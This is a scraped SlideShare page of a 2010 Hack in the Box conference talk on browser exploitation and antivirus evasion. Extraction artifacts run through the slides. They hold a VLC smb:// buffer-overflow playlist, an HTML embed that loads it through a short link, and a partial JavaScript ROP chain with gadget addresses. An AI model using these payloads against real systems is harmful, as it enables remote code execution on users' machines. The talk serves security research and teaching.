SlideShare uma empresa Scribd logo
1 de 38
W.E.B. 2010Web . Exploits . Browsers,[object Object],Saumil Shah,[object Object],Hack in the Box - Kuala Lumpur 2010,[object Object]
# who am i,[object Object],Saumil Shah, CEO Net-square,[object Object],LinkedIn: saumilshah,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
LOOK AT ALL THE COOL STUFF!!,[object Object],5,[object Object]
5,[object Object],33%,[object Object],MORE!,[object Object]
5,[object Object],With JIT!Fights DEP, ASLR!,[object Object]
5,[object Object],Worldwide coverage,,[object Object],Hides your tracks.,[object Object]
5,[object Object],...as never seen before!,[object Object]
5,[object Object],GUARANTEED!!,[object Object],Fresh new bugs,,[object Object],Present on most computers,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
I can haz sandbox,[object Object],I Also Can!,[object Object]
IM IN UR BASE,[object Object],KILLING UR D00DZ,[object Object],Sploit Time!,[object Object]
See no EVAL,[object Object],CVE 2010-2883,[object Object],(0+1)day exploit,[object Object],Obfuscated Javascript decoded without using eval, document.write, etc.,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
Who you gonna call?,[object Object]
howstuffworks - Anti Virus,[object Object],YER NOT ON THE LIST! COME ON IN.,[object Object]
howstuffworks - Anti Virus,[object Object],These are not the sploitz you're looking for.,[object Object]
0-day to the Face!,[object Object],"To get our new signature files you need a valid support plan.",[object Object]
...and keep on patching,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
W3C,[object Object],"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010],[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
Application Delivery,[object Object],The Web,[object Object],at present,[object Object],Authentication,[object Object],Statefulness,[object Object],Data Typing,[object Object],Non-mutable,[object Object],HTTP,[object Object],HTML,[object Object],AJAX,[object Object],Flash,[object Object],Sandbox,[object Object],HTML5,[object Object],Anti-XSS,[object Object],WAF,[object Object],Silverlight,[object Object],Web sockets,[object Object],MIND THE GAP,[object Object]
Sploit Time!,[object Object]
Making the impossible possible,[object Object],smb:// mrl buffer overflow,[object Object]
VLC smb:// overflow - playlist,[object Object],<?xml version="1.0" encoding="UTF-8"?>,[object Object],<playlist version="1",[object Object],   xmlns="http://xspf.org/ns/0/",[object Object],   xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">,[object Object], <title>Playlist</title>,[object Object], <trackList>,[object Object],  <track>,[object Object],   <location>,[object Object],      smb://example.com@0.0.0.0/foo/#{AAAAAAAA....},[object Object],</location>,[object Object],   <extension,[object Object],      application="http://www.videolan.org/vlc/playlist/0">,[object Object],     <vlc:id>0</vlc:id>,[object Object],   </extension>,[object Object],  </track>,[object Object], </trackList>,[object Object],</playlist>,[object Object]
...just add bit.ly,[object Object],smb:// mrl buffer overflow,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
100% Pure Alphanum!,[object Object]
VLC smb overflow - HTMLized!!,[object Object],<embed type="application/x-vlc-plugin",[object Object],		width="320" height="200",[object Object],		target="http://tinyurl.com/ycctrzf",[object Object],		id="vlc" />,[object Object],I'm in ur browser....,[object Object],...blowin up ur g00dz,[object Object],pwn,[object Object]
W.E.B. 2010 - Web, Exploits, Browsers
I'm an evil Javascript,[object Object],I'm an innocent image,[object Object]
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="",[object Object],EET - Exploit Enabler Technology,[object Object],<canvas>,[object Object]
The Solution?,[object Object],HTML 8.0,[object Object],HTTP 2.0,[object Object],Browser Security Model,[object Object],Self Contained Apps,[object Object]
shoutz...,[object Object],L33tdawg, Amy, cbelinda,[object Object],KUL volunteerz,[object Object],NL crew,[object Object],Paul Vixie,[object Object]
kthxbai,[object Object],www.net-square.com,[object Object],secure . automate . innovate,[object Object]

Mais conteúdo relacionado

Mais procurados

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureJames Jara
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deploymentGyuSeok Lee
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deploymentGyuSeok Lee
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websitesdrupalforest
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheJames Jara
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxJames Jara
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linuxJames Jara
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Joey Wilhelm
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.Jan Schaumann
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsPositive Hack Days
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...MilanAryal
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instaladoJames Jara
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 

Mais procurados (19)

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configure
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websites
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apache
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linux
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linux
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!
 
Robots
RobotsRobots
Robots
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never Sleeps
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instalado
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 

Destaque

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoSaumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 

Destaque (7)

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San Diego
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 

Semelhante a W.E.B. 2010 - Web, Exploits, Browsers

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net OdysseySaumil Shah
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?Erik Rose
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010Saumil Shah
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersPeter-Paul Koch
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationbrucelawson
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionPeter Lubbers
 
Best practices in museum search
 Best practices in museum search Best practices in museum search
Best practices in museum searchNate Solas
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schillerscottschiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsRicardo Varela
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEMDamien Antipa
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 

Semelhante a W.E.B. 2010 - Web, Exploits, Browsers (20)

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net Odyssey
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solr
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Yahoo for the Masses
Yahoo for the MassesYahoo for the Masses
Yahoo for the Masses
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The Browsers
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentation
 
[In Control 2010] HTML5
[In Control 2010] HTML5[In Control 2010] HTML5
[In Control 2010] HTML5
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert Session
 
Best practices in museum search
 Best practices in museum search Best practices in museum search
Best practices in museum search
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEM
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber Security
 

Mais de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Mais de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Último

Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
PicPay - GenAI Finance Assistant - ChatGPT for Customer Service
PicPay - GenAI Finance Assistant - ChatGPT for Customer ServicePicPay - GenAI Finance Assistant - ChatGPT for Customer Service
PicPay - GenAI Finance Assistant - ChatGPT for Customer ServiceRenan Moreira de Oliveira
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.francesco barbera
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfAnna Loughnan Colquhoun
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxYounusS2
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 

Último (20)

Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
